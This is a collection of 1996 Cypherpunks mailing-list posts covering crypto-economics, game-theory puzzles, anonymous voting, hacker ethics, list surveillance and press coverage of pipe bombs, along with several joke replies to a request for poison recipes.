reality not being optional, and that law and government is an inevatably
reactive and not proactive business.

He said there are many hypotheses about what causes this decline in
fertility, including the commonly held one that people make babies as a
form old age pension income :-), but that all he was talking about was this
very strong inverse correlation between population growth and life
expectancy. He talked about this happening in Athens, and on the Italian
peninsula during the Roman empire, and gave other historical examples,
including, of course, Europe and America, Sweeden at the turn of the
century being a good example. He said America was the exception which
proves the rule, because most of our population growth now comes from
immigration, and that one way to kill the vitality of America was to kill
immagration, which should give erst-superpatriot Buchananite/Perotistas
some pause for reflection. He even manges to describe the post-war
baby-boom in these terms, but I forget how he did it.

He also said that the obvious things like public health and education were
good ways to increase life expectancy, but that the very best way to cause
this "demographic transition" was a dramatic increase in personal income.
:-).

Given the recent Forbes "Billionaire" issue, calling the 21st century the
"Asian Century", full of stories of the unleashed economic power of the
former command economies of India, Indonesia, Malaysia, etc., not to
mention China and VietNam or even Korea and Japan (yes, Virginia, they were
and are quasi-command economies, especially in their domestic accounts)
and, to a lesser extent, Singapore, I think he may be on to something
here...

The crypto-economic relavence here is that once we have the ability to have
peer-to-peer transactions for everything transmittable (financial assets,
expertise, even teleoperated skillsets), economic "commands" won't be
audible for all the din of internet digital commerce.

Watch what happens to life expectancy then...


Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 28 Jul 1996 16:11:49 +0800
To: cypherpunks@toad.com
Subject: Re: Twenty Beautiful Women
Message-ID: <ae20465614021004eb6f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:54 AM 7/28/96, Mike Duvos wrote:
>ichudov@algebra.com (Igor Chudov @ home) writes:
>
> > Also, I would appreciate if someone specified what exactly
> > the goal function is.
>
>Me too.
>
>This is an interesting problem, vaguely reminescent of the pie
>judging contests commonly used as examples of non-parametric
>statistics.  Given two pies, (or two women), a judge can
>subjectively order them by tastiness, (or beauty), but there is
>no concept of an continuous metric in which the ratings of
>particular items are embedded.

You're both reading far too much into this problem. David S. specified
"beauty," the personal judgment of the chooser. No deep philosophical
meaning.

Perhaps an equivalent formulation will make this clearer:

One is passing through a town with 20 gas stations, with gas at various
prices. The stipulation is that one cannot turn around. Once a gas station
has been passed, there's no turning back. So, what is the best strategy for
finding the lowest gas price (or shortest lines, or cleanest appearance, or
brightest sign, or whatever one wants to analyze). Or even by the most
beautiful girl standing in front, to return us to the original statement.

So, you see, the problem is well-defined, with an elegant solution.

--Tim May



Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Mon, 29 Jul 1996 05:20:44 +0800
To: pjn@nworks.com
Subject: Re: cypherpunks vs hackers
In-Reply-To: <TCPSMTP.16.7.28.12.59.42.2645935021.656889@.nworks.com>
Message-ID: <Pine.LNX.3.94.960728150110.129B-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 28 Jul 1996 pjn@nworks.com wrote:

>  It is interesting to note that while both groups have opposite
>  objectives (Hackers want all information free, where cypherpunks want
>  everbody to be able to have privacy), and yet in there own ways, they
>  are both right.

I don't entirely agree with this.  I think both groups want information to be
free, but also want people to be able to have privacy.  Most hackers (used in
the sense of people who break into computers) attack computers owned by such
companies as TRW and the phone companies.  Both of these systems have little
regard for privacy.  Most non-malicious hackers promote system security, but
at the same time, don't like government-controlled monopolies and agencies to
be able to keep secret information that should be free.  A very interesting
paper by Dorothy Denning (she used to be regarded very highly by the hacker
community before she started to support Clipper) expresses some of the
concerns and morals of hackers.  It's called "Concerning Hackers Who Break Into
Computer Systems" and is in Phrack issue 32.

> 
>  I think what we need to define is the diffrence between hackers and
>  crackers. A hacker breaks into a computer like a cracker (but the 
>  similarities end there).  The hacker just want to look and learn, 
>  possably "map out" the system just to see how everything works with
>  everything else.  Crackers break into computers for the sake of 
>  destroying or stealing information or the system itself.

That's debatable.  I think many people incorrectly consider these terms to be
mutually exclusive.  There are many hackers (used in the sense defined in the
Jargon File) who also break into systems and could therefore be considered
crackers also.  Most hackers definitely have the knowledge to break into
computer systems, but many crackers aren't very well versed in programming and
learn how to break into computers by using canned programs and G-files.

> 
>  Both cypherpunks and hackers think that the government is wrong
>  in many things that they do.

Agreed.

PGP encrypted mail prefered
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/  


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMfu9sbZc+sv5siulAQHhCgP/UZ/HQ2e0jeyzuVv+zuMZux4A2gmrsgtY
GcasxhtY9iD67fSjX5ujympfPtWEH7gtFjEVxasdbwpePaJhlKnZ0OpEGRsX3lZc
0PujC19M5U0GarGc0MUJrU0mpywch4bGPgr/hOBx0gOgnQZwmVVXwawN2te7rpb0
Ynej29oTTWQ=
=RC2J
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Mon, 29 Jul 1996 05:33:48 +0800
To: anonymous-remailer@shell.portal.com
Subject: TLAs on cypherpnks (was Re: ALL OF YOU ARE CRIMINAL HACKERS)
In-Reply-To: <v02140703ae2126c4bae3@[204.167.110.200]>
Message-ID: <Qlyw0Pi00YUw082qk0@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 28-Jul-96 Re: ALL OF YOU ARE
CRIMINAL.. by anonymous-remailer@shell 
> Tips for reporting this 'clandestine' list to the FBI (and it's contributors)
>  
> 1) Be sure to speak slowly and use small words when contacting the FBI.
> 2) If you can, be sure to work the words 'Pipe Bomb', 'Olympics', and/or
> 'TWA' into your sentences.
> 3) Remember to unsubscribe from the list before reporting it.

At a recent conference in downtown DC, I was chatting with a few folks
in the hotel bar. One of 'em was reminiscing about his days at the CIA
and I reminded him that during my presentation earlier that day I talked
about crypto-anarchy (giving appropriate credit to Tim May, of course).

I asked him if he had ever monitored the cypherpunks list. "No, I
didn't. It was too high-traffic," he said. "But the guy in the next
office over from me did."

Is this the first confirmed report of TLA cypherpunk-monitoring?

-Declan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jerome Tan <jti@i-manila.com.ph>
Date: Tue, 30 Jul 1996 17:10:58 +0800
To: "'cypherpunks@toad.com>
Subject: Source Codes in C or Pascal
Message-ID: <01BB7E24.F8E80BE0@ip74.i-manila.com.ph>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone knows where to find source codes of sample encryption programs? I just wanted to know how they work... Thanks in advance!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jerome Tan <jti@i-manila.com.ph>
Date: Tue, 30 Jul 1996 16:45:46 +0800
To: "'cypherpunks@toad.com>
Subject: HD Encryption
Message-ID: <01BB7E25.00B25EC0@ip74.i-manila.com.ph>
MIME-Version: 1.0
Content-Type: text/plain


Is there such thing as HD encryption?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Mon, 29 Jul 1996 02:48:53 +0800
To: pjn@nworks.com
Subject: Re: ALL OF YOU ARE CRIMIN
In-Reply-To: <TCPSMTP.16.7.27.-13.30.38.2645935021.656744@.nworks.com>
Message-ID: <Pine.BSF.3.91.960728163004.8008D-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 27 Jul 1996 pjn@nworks.com wrote:

>  > At 09:33 PM 7/26/96 -0700, anonymous-remailer@shell.portal.com wrote:
>  >I AM NOT GOING TO TOLERATE EXISTENCE OF A MEDIUM FOR CRIMINAL HACKERS
>  >AND MUNITIONS SMUGGLERS. I WILL COMPLAIN TO THE FBI IMMEDIATELY SO THAT THEY
>  >CAN TRACK YOU DOWN AND CLOSE THIS LIST.
>  >
> 

Yes, your remailer appears to be working. You're welcome.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scottauge@aol.com
Date: Mon, 29 Jul 1996 07:01:13 +0800
To: cypherpunks@toad.com
Subject: Just some comments on what I've read here
Message-ID: <960728163937_247531092@emout12.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


1) Seems to be some excitment about banning information on the internet
here...

Setting up a set of computers for a private net is not that big a deal (just
some money involved and with the availability of Linux - a UNIX variant - for
free make it hardware and telephone costs.)  Do it for companies all over
(hence the aol address - just a local phone call from anywhere!) and it works
just fine.

So if people want to play by different rules.. it's possible.  Think of it as
a members only social club.  (I can make computers real hard to get into, but
social engineering kicks my butt all the time.)

2) Whats wrong with America?

I've been leaning towards Libertarian for some time now.  Voted for Ross last
time as a message I ain't happy with how things are going over there.  Likely
gonna vote Harry Brown - my first vote for a Libertarian.  (He is seems to
have it together versus the others) - but hey, gettin off the subject
here....

Seems we are no longer United in these United States...

A stranger is not a potential friend or ally but a potential robber, baby
raper... you fill in the blank.  We're all scared of each other!

Something has been happening where rich are pitted against the poor, the
working against the non-working, races vs other races.  Is it a conspiracy as
some of my friends who look for black helicopters say, or a natural reaction
of politicians and "leaders" seeing a formula that works and then
implementing it.

To much Hard Copy and Extra reporting out there too.  I don't give a rat's
a*s about most of the sh*t their putting out (censorship mine for those with
delicate eyes).  But US culture has become very valuable and ya gotta get
them foreign markets ya know.

There was a time when a famil could have a picnic on the white house lawn.
 Then it got gated, now the street is closed.  Our leaders seem to be no
longer among us.

But it doesn't matter.  Some beuracrat (sp) gets a bug up their butt to give
you trouble, your f*cked.  With a seconds thought and a signature on a peice
of paper ya can have your land gone or your bank account cleared or you name
it.  One second and on to the next thing as far as they are concerned.  Can
we impeach them? Can we vote for someone else next time?  They're a buffer
between the ones we can give trouble too.

Plus Laws are so damn big these days.  It takes a ream of paper (sometimes a
whole 3000 page box of paper) to print these things out.  You can bet the
leg. not reading these things!  They got advisors to read over sections and
say this is good, this is bad.  The real representatives and senators are out
looking for campaign money.  So damn, I now speculate these guys and gals are
letting the advisors put the laws together - again someone not answerable (or
even known) to the public.

So now, you got legislators not reading the bills they are working on and
there is a whole army of serfs ready to make some regulations that are in
effect the same as law and ready to start looking for people to bother so
they can look busy - and these serfs are not answerable to the public.

Sorry, but congress is a part time job as far as I'm concerned.  These laws
are the result of people with nothing to do.

I listen to the TV set and I hear "Oh we gotta law comin to fix this".
 Bullsh*t.  There are plenty of other laws out there to hassle trouble makers
with.  They didn't nab Capone on murder, but on tax evasion.  People fix
stuff, not laws.  Somebody is measuring their prouctivity by the amount of
paper they can spew out of their office.

3) I'm a keen believer in Social Evolution

A quick definition:  If your a drug addict and your stupid enough to OD, you
deserve to die.

Another example: Your a drug dealer and ya get shot - oh well.  Goes with the
choice , dude.

We keep protecting people from their choices.  We think we are doing a favor
for ourselves but I POSTULATE we are not.

We keep on fightin nature and it just ain't possible.  There just might be a
reason for this weedin out process.  But I'll admit it - I have a prejudice
against stupid people - not mentally hadicapped, but stupid people.

Well, thanks for reading my ranting and raving....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Mon, 29 Jul 1996 10:18:06 +0800
To: anonymous-remailer@shell.portal.com
Subject: Re: your favorite poison recipes
In-Reply-To: <199607281911.MAA02693@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.91.960728170901.21775A-100000@crl10.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sun, 28 Jul 1996 anonymous-remailer@shell.portal.com wrote:

> Please post your favorite poison recipes to this mlist.

Okay, glad to oblige.  The French name for my recipe is:


			POISSON D'AVRIL


Buy one fresh mackerel for each person you expect to serve.  Do
not buy mackerels with clouded eyes; they have been frozen or are
too old, or both.  They eye's should be clear with a slight sheen.

With a sharp knife, split each mackerel lengthwise, remove the
bones and place skin side down on a buttered baking pan.  Brush 
the top of each mackerel with clarified butter in which...


Oops, my mistake!  I thought you said "poisson."  Never mind.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Rosoff <drosoff@ARC.unm.EDU>
Date: Mon, 29 Jul 1996 10:03:49 +0800
To: Eric Murray <bqm1808@is.nyu.edu (Brendon Macaraeg)
Subject: Re: "privatizing" phones?
Message-ID: <1.5.4.16.19960728232828.46cf5af8@arc.unm.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 04.11 PM 7/26/96 -0700, Eric Murray wrote:

>It's a 46mhz analog model, newer phones use frequencies
>in the 900mhz range and/or digital encoding.
>The 900mhz range is one of those 'blocked' in most newer radio
>scanners, this is required by law as of a few years ago.
>Many scanners can have some or all of the locked-out
>ranges restored by suitable modification (i.e. removing
>a resistor).  Many of these mods are posted on the net.

One of my friends has a Radio Shack scanner (the cat.
# of which I do not recall) which does pick up the 900MHz
range. We tried (unsuccessfully) to modify it according to
an internet posting. I don't know how old it is.

===============================================================================
David Rosoff (nihongo ga sukoshi dekiru)  --------------->  drosoff@arc.unm.edu
PGP public key 0xD37692F9 -----> finger drosoff@acoma.arc.unm.edu or keyservers
0xD37692F9  Key fingerprint =  25 7D AA 01 85 41 43 89  50 5A 33 76 F1 F1 99 67
Do you know who's reading your email? ---> http://www.arc.unm.edu/~drosoff/pgp/
Is it a forgery? --- I have PGP signed all email and news posts since May 1996.
===============================================================================
"Relax. It's not a real alarm. They can't crack _Pentagon_ codes. Can they?" :p

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMfqQkRguzHDTdpL5AQFCuQP+ILE3NAbjEZ2p6d6WDIhoi9yNYafQOiSv
u00hink6Ylz8pQGP1xhQ9Bsn5pLyrS9Mck/UJ4Qw6omJBrE2LkgNy5Du8xdkqlQu
9MZaVqPXYphnGdAJ+oORXhvSkI9G0qYZPJjByypMd4Da92vqmDogrdTJFKgK21vh
OeTNyh8i+zQ=
=55JX
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Rosoff <drosoff@ARC.unm.EDU>
Date: Mon, 29 Jul 1996 10:01:31 +0800
To: Alan Horowitz <jacquard@teleport.com>
Subject: Re: Questions...
Message-ID: <1.5.4.16.19960728232836.46cf8b88@arc.unm.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 12.12 PM 7/27/96 -0400, Alan Horowitz wrote:

>> Hello, I would rather I not be too blunt, but despite my generous
>interest in computer > hacking cracking, and other such related topics, I
>have come to be confused by the > mailer, can I ask any questions that I
>wish, or am I limited by some type of header > subject?
>
>
>
>Shaun, let me explain. There's a committee of seven people. Me, Tim May,
>David Sternlight, some assination-politics guy, some guy named Vultis or
>somesuch, and so on. 
>
>Only if we're in unanimous agreement on the outcome of an issue, may you 
>start a thread on a new topic. which then continues till the first 
>posting which calls someone a Nazi.

And if they *don't* like your suggestion, you get killed and they move on to
the next guy's suggestion of how to split up the available issues so that
each cypherpunk gets a fair share of ranting.

===============================================================================
David Rosoff (nihongo ga sukoshi dekiru)  --------------->  drosoff@arc.unm.edu
PGP public key 0xD37692F9 -----> finger drosoff@acoma.arc.unm.edu or keyservers
0xD37692F9  Key fingerprint =  25 7D AA 01 85 41 43 89  50 5A 33 76 F1 F1 99 67
Do you know who's reading your email? ---> http://www.arc.unm.edu/~drosoff/pgp/
Is it a forgery? --- I have PGP signed all email and news posts since May 1996.
===============================================================================
"Relax. It's not a real alarm. They can't crack _Pentagon_ codes. Can they?" :p

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMfqXpBguzHDTdpL5AQHkjQQAoLcf75f6TcKCGUaoq0c1JiL+seDFgw2l
LQNHY+P/coI8KmQeEpeZgdAVEmts+BNbhGfHSaHTFtyAoUP24OfRDyVr7Mn4d0gF
1wuDp4aVNtGAEMCVkg9dXL6Klf38NeglU1EH2522loYo6g6/ANiTdPX729KrMNMO
3iPydVCu0aI=
=NhSg
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Mon, 29 Jul 1996 11:34:45 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: BOMB PLANS
Message-ID: <Pine.SUN.3.91.960728175909.9109A-100000@crl13.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

The Sunday San Francisco Examiner had an article about how simple
it is to make a pipe bomb.  It was syndicated from the Dallas
Morning News.  In the article a "federal bomb expert" opined:

	They're probably one of the more common explosive
	devices that are encountered.  That's because the
	pipe not only provides a container, but fragments
	into sharapnel."                        ^^^^^^^^^
	^^^^^^^^^^^^^^
Now I don't know what takes to qualify one as a "bomb expert,"
but the standards must be pretty low.  The reason hand grenades
look like pineapples is because it's very difficult to get metal
to fragment unless it is scored or otherwise predisposed to come
apart in little pieces.  What I've been told is that a pipe bomb
just peals open at it's weakest place and otherwise stays in one
piece.  Don't know, but that's what I've heard.  Makes sense to
me.

To put the fear of god in the readers the article dutifully 
chants the following mantra:

	Detailed instructions for making pipe bombs and
	other explosive devices are available for sources
	as varied as anti-government publications [what
	about GOVERNMENT publications?], pamphlets sold
	at gun shows and the Internet.

Are we surprised?


 S a n d y

P.S.	On an odder note, the same paper had an article 
	entitled, "Two-headed baby born in Tijuana." 
	The article reported, "...the child (sic) had
	been born with two spinal columns and two heads"
	One of the more bizarre statements was, "It's
	not clear whether un-named girl--or girls--are
	Siamese twins."

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Christopher J. Shaulis" <cjs@netcom.com>
Date: Mon, 29 Jul 1996 10:41:47 +0800
To: jimbell@pacifier.com (jim bell)
Subject: Re: your favorite poison recipes
In-Reply-To: <199607282123.OAA06727@mail.pacifier.com>
Message-ID: <199607282228.SAA01051@localhost.cjs.net>
MIME-Version: 1.0
Content-Type: text


> At 12:11 PM 7/28/96 -0700, anonymous-remailer@shell.portal.com wrote:
> >Please post your favorite poison recipes to this mlist.
> 
> I recommend a book called "Handbook for Poisoners," by Raymond Bond.  While 

I recommend:

	2oz Kahula
	2oz Vodka
	2oz Creme

	Mix this with some ice in a glass, garnish with a cherry.
	
	If you use Midori instead of Kahula, it turns a really cool
	shade of green.

	Drink. 
	
If ya don't like my poison, pick ya own. =)

Christopher




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tob@world.std.com (Tom Breton)
Date: Mon, 29 Jul 1996 08:30:09 +0800
To: cypherpunks@toad.com
Subject: Re: Schelling Points, Rights, and Game Theory--Part II
Message-ID: <199607282239.AA07299@world.std.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:
> [Schelling Points, rights, etc.]

This seems more a case of "the border is at the river" than Schelling
Points. The river is the border because it hard to cross (harder than
dry land), not because it is easy to see.

        Tom





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tob@world.std.com (Tom Breton)
Date: Mon, 29 Jul 1996 09:04:27 +0800
To: cypherpunks@toad.com
Subject: Re: Publicly Verifiable Anonymous Voting System
Message-ID: <199607282239.AA07297@world.std.com>
MIME-Version: 1.0
Content-Type: text/plain


JonWienk@ix.netcom.com writes:
>


That doesn't really do it. In fact, I'm not sure why you move in this
direction at all. No offense.

Seems to me that voter registration of some kind must be UNanonymous. I
want to have confidence that my empowered political opponents aren't
voting 10,000 times each.

It also seems to me that if the entire system is the government's
black-box, there is no anonymity. It is a trustworthy as the government
itself. At worst, if they want to know how you voted, they can sum all
votes, then sum all votes but yours, then subtract.

Seems to me that the best thing would be a system where you the voter
pick who is to handle your vote, in a sort of hierarchical tree. Each
level has the same goal as a DC net, to make it difficult to tell who
among many people communicated, and further levels confuse which group
did, and which group-of-groups did, and so forth.

Each group delivers its collected votes, publicly but unidentified, to a
group-of-groups, and watches that groups' output. Obviously you would
use multiple envelopes to prevent premature disclosure.

At each level, you need to be able to identify your own vote and check
that it is unaltered, but no-one else should be able to associate it to
you. This assumes that there is no way for anyone to see you looking for
your own ballot, which is a separate facet of the problem.

Everyone needs to be able to see that the collected votes did not exceed
the number of voters that group has.

This is pretty simple and requires a fair bit of collaboration to
defeat. But it can be partially defeated by partial collaboration and
the rest guessed from parallel voting patterns. If your entire group is
seen to vote the same way, your vote among them is obvious.


        Tom





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tob@world.std.com (Tom Breton)
Date: Mon, 29 Jul 1996 09:22:50 +0800
To: cypherpunks@toad.com
Subject: Re: Twenty Bank Robbers -- Game theory:)
Message-ID: <199607282239.AA07295@world.std.com>
MIME-Version: 1.0
Content-Type: text/plain


What the 20 Cypherpunk Bankrobbers do, aside from writing "Memo: Need
better loot-division scheme. *URGENT*."


Assume every player acts completely rationally, and unwaveringly trusts
every other player to fully understand the situation and act solely to
maximize their profit in this single situation.

Also assume that each player announces an immutable, unconditional
monetary distribution before anyone has voted, and the announced
distribution constitutes the whole of the payoff (no way to make or
enforce promises, no external loyalties, no side payments, etc.)

Also assume no revolt against the rules is possible.

Every proposer makes the most profitable deal for himself that will pass
the vote, if they can predict it (As it happens, they always can with
one exception, see below)

Every player, when voting, compares what he is offered right now with
what he will be offered between now and the first guaranteed successful
proposal.

He inspects the future possibilities and sees that the next offerer can
make a successful proposal if they (the player) vote down the current
proposal, and if his vote is needed this time, it will not be needed for
the next offer to succeed. (You can check this assumption below).

So he sees no reason to hope for a better result by voting against
apparently favorable offers.

----

If we were to keep the condition that all other things being equal,
players vote for the other players to live, the proposer always keeps
the *entire* amount.

If a player expects to be offered no money next time, it makes no sense
to offer him anything this time, because you've got his vote for sure
anyways (nice guys finish last). Working backwards, once a player will
be shut out in the future, it never makes sense to cut him in.

In fact, for each player it makes sense to some proposer to shut him
out. The guy next in line will never vote for the proposer to live, so
is always shut out. So nobody but the proposer expects any money and
everybody but the guy next in line votes for the proposer to live.

----

So instead I'm going to assume that if a player does not do *better*
than he will next time, he votes against the proposer.

The result is that the first player not only lives, but makes out like a
bandit, to the extent that the loot is subdividable. If there were 40
million and 1 guys in line, he'd be meat. Likewise, if the money was all
in $2,500,000 notes he should start framing his last words.

I'm going to write it in reverse order, where #0 is the last guy, #1 is
second to last, etc. because it's easier to see the progression that
way.


1 Player:
    #0: everything
    Voting for: #0
    Trivially succeeds 1/1

2 players:
    #0: nothing
    #1: Everything
    Voting for: #1
    Succeeds 1/2

3 players:
    #0: $.01
    #1: nothing
    #2: Everything else.
    Voting for: #0 #2
    Succeeds 2/3

4 players:
      #1: $.01
      #0, #2: nothing
      #3: Everything else.
    Voting for: #1 #3
    Succeeds 2/4

5 players:
    #1, #3: nothing
    #0, #2: $.01
    #4: Everything else.
    Voting for: #0 #2 #4
    Succeeds 3/5

6 players:
    #1, #3:     $.01
    #0, #2, #4: nothing
    #5: Everything else
    Voting for: #1 #3 #5
    Succeeds 3/6


The other cases proceed similarly, grouping even/odd. In the end, the
guy at the head of the list offers every other guy a penny and keeps the
rest -- and then starts to sweat as he wonders whether our assumption of
perfect rationality will hold up in real life.

Paul Foley nearly got it, but it does matter who is offered money. If it
didn't, then nobody could count on doing worse on the next proposal.

--------

The case where the proposer does not get a vote is completely different:

1 Player:
    #0: everything
    Voting for:
    Vote is indeterminate 0/0
    Player seals himself into a box with the money, Schroedinger's cat,
    and a vial of poison that has a 50% chance of being shattered.

Everything that follows depends on how we resolve that case. If we
assume some probability mixture of money & death, it is not given how to
weight the player's negative payoff (death) vs positive payoff (money).

Let's assume Schroedinger's player gets all the money and is not
required to suicide.

2 players:
    #0: Everything
    #1: nothing
    Voting for:
    Fails 0/1

Remember the assumption that if a player does not do *better*, he votes
against the proposer. This is a null move since the outcome is the same
as above.

3 players:
    #0: nothing
    #1: $.01            (or nothing)
    #2: Everything else
    Voting for: #1
    Succeeds 1/2

Note that we assumed that #1 requires strictly more money than he would
otherwise be offered (His life means nothing to him). Otherwise he would
be offered $0. (Yeah, I don't want to rewrite the analysis just for
that). It would end up with the same pattern, though, just faster.

4 players:
    #0: $.01
    #1: $.02            (or $.01)
    #2: nothing
    #3: Everything else
    Voting for: #0, #1
    Succeeds 2/3

That fact that the proposer cannot vote means he needs to pick up an
extra vote. He can't get it from the guy who would get almost
everything, and a penny secures the vote of the player who would get
nothing. So he has to offer the player who would get $.01 the next
increment of money. If #1 valued his life, he'd be offered $.01 instead.


5 players:
    #0: $.02
    #1: nothing         (or group #0,#1 interchangeably)
    #2: $.01
    #3: nothing
    #4: Everything else
    Voting for: #0, #2
    Succeeds 2/4

...leaving the next (previous) proposer a similar position.

6 players:
    #0: nothing
    #1: $.01            (or group #0,#1,#2 interchangeably)
    #2: $.02
    #3: $.01
    #4: nothing
    #5: Everything else
    Voting for: #1, #2, #3
    Succeeds 3/5

7 players:
    #0: $.01
    #1: ?
    #2: nothing
    #3: ?
    #4: $.01
    #5: nothing
    #6: Everything else
    Voting for: #0, #4, ?
    Succeeds 3/6

For the first time here, one of the proposers has an arbitrary decision.
He has #0 and #4 and he needs to pick up one more vote. He can't do it
for $.01 and there are two ways to do it for $.02.

We would have encountered this situation earlier if #1 valued his life.

Here we have to add some notation to indicate a non-determinate
distribution over a set:
(set): (non-zero payoffs, all others are 0) average

7 players:
    #0: $.01
    (#1,#3): ($.02) average $.01
    #2: nothing
    #4: $.01
    #5: nothing
    #6: Everything else
    Voting for: #0, #4, (#1 or #3)
    Succeeds 3/6



8 players:
    #0: ?
    (#1,#3): ?
    #2: $.01
    #4: ?
    #5: $.01
    #6: nothing
    #7: Everything else
    Voting for: #2, #5, ?, ?
    Succeeds 4/7


The proposer easily gets #2 and #5 and needs two more votes. #6 can't be
reached. The rest all have an expected payoff of $.01, so he gives $.02
to any two of them. Our indeterminate-list seems to be growing.


8 players:
    (#0, #1,#3, #4): ( 2 x $.02) average $.01
    #2: $.01
    #5: $.01
    #6: nothing
    #7: Everything else
    Voting for: #2, #5, 2 of (#0, #1,#3, #4)
    Succeeds 4/7


9 players:
    (#0, #1, #2, #3, #4, #5): ( 3 x $.02) average $.01
    #6: $.01
    #7: nothing
    #8: Everything else
    Voting for: #6, 3 of (#0, #1, #2, #3, #4, #5)
    Succeeds 4/8

The indeterminate-list has now swallowed up everything but the last 3
players and will continue to do so because the average payoff to the
list is always more than $.01 and less than $.02.

10 players:
    (#0, #1, #2, #3, #4, #5, #6): ( 4 x $.02) average $.08/7
    #7: $.01
    #8: nothing
    #9: Everything else
    Voting for: #7, 4 of (#0, #1, #2, #3, #4, #5, #6)
    Succeeds 5/9


--------


Another set of assumptions is that the players do not trust each other
to be rational or to see all outcomes. In this case, the guy at the head
of the line says in a loud voice to the guy behind him: "Whoever would
vote to kill me even though I offer them money would vote to kill you
too even if you split the money with them, so if it gets to you you
should cut out anyone who got my money but voted to kill me, but keep
those who got my money and voted to keep me alive."

He then allocates equal portions to half the group, including himself
and not including the guy behind him. He probably lives.

--------







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Seth Oestreicher <setho@westnet.com>
Date: Mon, 29 Jul 1996 08:56:52 +0800
To: Mike McNally <m5@vail.tivoli.com>
Subject: Re: Feinstein wants controls on Internet, Books
Message-ID: <1.5.4.32.19960728224008.0095b920@westnet.com>
MIME-Version: 1.0
Content-Type: text/plain




>There's a diagram of a pipe bomb on the CNN web site, in the story about
>the horrible things.

In case you want to see, check it out at:
http://www.cnn.com/US/9607/27/pipe.bomb.explain/index.html

The picture that is on the page gives enough information for the average
person to go to the hardware store and buy the parts.....

Not only do they HAVE to point out that the information is available, but
also provide it.  *NOW* who is irresponsible?

Seth





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Mon, 29 Jul 1996 11:49:50 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: TLAs on cypherpnks (was Re: ALL OF YOU ARE CRIMINAL HACKERS)
In-Reply-To: <Pine.SV4.3.91.960728193638.5123H-100000@larry.infi.net>
Message-ID: <Pine.SUN.3.91.960728184132.15273A-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


I believe my source, who's given me nothing but accurate information
before. YMMV, and you will of course filter this through how much you
trust *me* to evaluate him. But in the absence of a formal statement from
the NSA legal counsel, I think this as good as it gets. 

-Declan


On Sun, 28 Jul 1996, Alan Horowitz wrote:

